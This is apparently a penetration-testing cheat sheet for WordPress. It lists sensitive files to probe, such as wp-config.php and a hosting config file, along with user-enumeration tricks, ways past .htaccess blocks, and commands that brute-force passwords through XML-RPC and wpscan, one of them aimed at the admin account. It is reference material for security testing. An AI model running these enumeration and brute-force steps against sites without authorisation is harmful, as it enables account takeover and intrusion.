Skip to content

Wordpress

General & Tricks

# Username can be guessed on WordPress since the username will generate a different error message if it doesn't exist.

# Interesting files
https://monsite.com/robots.txt
https://monsite.com/feed
https://monsite.com/readme.html
https://monsite.com/xmlrpc.php

# Configuration files
https://monsite.com/.htaccess
https://monsite.com/wp-config.php

# Directory listing
https://monsite.com/wp-includes

# XML-RPC attack (https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit)
# You can bruteforce users
./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username1

# If by any way you can upload files, go check /upload or /uploads for your files

# Get WPEngine's config file
/_wpeprivate/config.json

Scanning and enumeration

# Enumerate users
Users can be found using ?author=XXX

# You can also use this
using /wp-json/wp/v2/users, then iterate that way /wp-json/wp/v2/users/1

# If /?author=1 is 403 Forbidden, you can bypass it
# If the .htaccess blocks "?author"
# Bypass 1 : http://xxx.fr/?x&author=1 --> http://xxx.fr/author/chris/?x
# Bypass 2 : http://lictor.fr/index.php?author=1

# Another way
/wp-json/?rest_route=/wp/v2/users

# WPScan is a great automatic tool (you can dockerise)
docker pull wpscanteam/wpscan
docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options]

# Non intrusive scan
wpscan.rb --url www.example.com

# Bruteforce users found using 50 threads
wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

# Bruteforce on one user
wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

# Plugins enumeration
wpscan.rb --url www.example.com --enumerate p

# Users enumeration
wpscan.rb --url www.example.com --enumerate u